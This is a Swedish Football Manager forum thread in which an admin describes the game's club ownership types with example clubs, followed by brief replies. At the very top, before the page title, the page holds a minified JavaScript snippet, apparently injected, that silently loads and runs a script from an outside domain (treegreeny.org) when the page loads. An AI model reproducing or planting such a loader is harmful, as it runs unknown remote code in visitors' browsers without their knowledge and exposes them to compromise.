;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [Avsnitt 17] Dannes Lördagsgodis – Ägarskap [12-09-20] – Äldre utgåvor – FMSweden Forum
Meny Stäng

[Avsnitt 17] Dannes...
 
Share:
Notifications
Clear all

[Avsnitt 17] Dannes Lördagsgodis - Ägarskap [12-09-20]

5 Inlägg
4 Users
8 Reactions
921 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

För er som inte vet så finns det olika typer av ägarskap på FM precis som i verkliga livet. Jag tänkte därför lite snabbt gå igenom vad de alla innebär och dessutom ge exempel på klubbar i varje olika ägarskap. Ett ägarskap är i grund och botten de som äger klubben och bestämmer vad som kommer att hända med den, inte sportsligt(även om en del ägare tycker sig vara både sportchef och tränare emellanåt) utan mer allt runtomkring så som faciliteter, arena och mer ekonomiska aspekter.

Förgrund

Gillar du pengar, och då snackar vi stora summor, så är detta ägarskapet för dig. Oligarker och andra miljardärer av olika slag som rent ut sagt pumpar in pengar i klubben de äger och du behöver aldrig riktigt oroa dig för att inte kunna utveckla klubben. För många fotbollssupportrar anses detta vara fusk eller doping och jag kan till viss del faktiskt hålla med om det. Totalt finns det 31 Förgrunds-ägare vid spelets start.

De enda europeiska klubbarna med Förgrunds-ägare:
Manchester City (England)
Paris Saint-Germain (Frankrike)
AS Monaco (Frankrike)
Hertha Berlin (Tyskland)
Almería (Spanien)
FC Lausanne-Sport (Schweiz)
Futebol Clube Famalicão (Portugal)
Lusitânia de Lourosa Futebol Clube (Portugal)
Larne (Nordirland)

Bakgrund

Även en ägare som jobbar i bakgrunden har gott om pengar och investerar gärna, men är till skillnad från en Förgrunds-ägare inte den som pumpar in pengar i klubben för att nå framgångar. Det blir således en större utmaning än föregående men samtidigt är det ett ägarskap som har ambitioner om att utveckla klubben vilket känns som ett mer humanare tänk. Totalt finns det 75 Bakgrunds-ägare vid spelets start.

Exempel på klubbar med Bakgrunds-ägare:
Olympiakos SF Piraeus (Grekland)
PAOK Saloniki (Grekland)
Wolverhampton Wanderers (England)
AFC Bournemouth (England)
Rio Ave Futebol Clube (Portugal)
FC Sion (Schweiz)
Portimonense Sporting Clube (Portugal)
FC Lugano (Schweiz)
Raith Rovers (Skottland)
F.C. Andorra (Spanien)
Salford City (England)

Garant

En garant är ett ägarskap som inte heller kommer pumpa in pengar eller investera i klubbens faciliteter mer än nödvändigt utan fokuserar mest på att hålla ekonomin på en hälsosam nivå. Du kommer att behöva förlita dig på spelarförsäljningar, tv-avtal och andra typer av sponsorer för att utveckla klubben. Totalt finns det 239 Garant-ägare vid spelets start.

Exempel på klubbar med Garant-ägare:
Chelsea Football Club (England)
Zenit St. Petersburg (Ryssland)
Galatasaray A.S. (Turkiet)
TSG 1899 Hoffenheim (Tyskland)
FC Krasnodar (Ryssland)
Leicester City (England)
Everton Football Club (England)
Stade Rennais FC (Frankrike)
RB Leipzig (Tyskland)
Vitesse (Holland)

Det finns ytterligare ett ägarskap vid namn Försäkringar (Förväntad återbetalning) som innebär att en sådan ägare förväntas ta ut pengar från klubben efter varje säsong vilket är olika siffror beroende på hur mycket klubben har tjänat den gångna säsongen. Det handlar om tre portugisiska klubbar samt sju kinesiska klubbar där de tre mest kända klubbarna är Estoril från Portugal samt Guangzhou och Hebei från Kina. Med det sagt så har du samtliga ägarskap som en klubb kan ha och naturligtvis finns det medlemsägda klubbar och dylikt men det är inget som genererar pengar eller försöker behålla en balans som de tre ovanstående ägarskapen gör.


   
Citera
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

mkt intressant läsning danne!!!

PW


   
SvaraCitera
Karamellkungen
(@casper)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Hur kan man checka olika klubbars ägarstatus i en save? Hade velat se vad min ägare i Watford står bland dessa, kan även vara kul vid framtida jobb att veta var ägaren står. 

Bra text som vanligt Danne! ? 

Maratontabellen


   
SvaraCitera
(@blaaper)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

Har också samma undran som ovan?


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

@casper @blaaper

Mycket bra fråga, inget jag alls tänkt på eller resonerat kring faktiskt. Jag ska forska lite kring detta och återkommer när jag har mer kött på benen!


   
SvaraCitera
Share: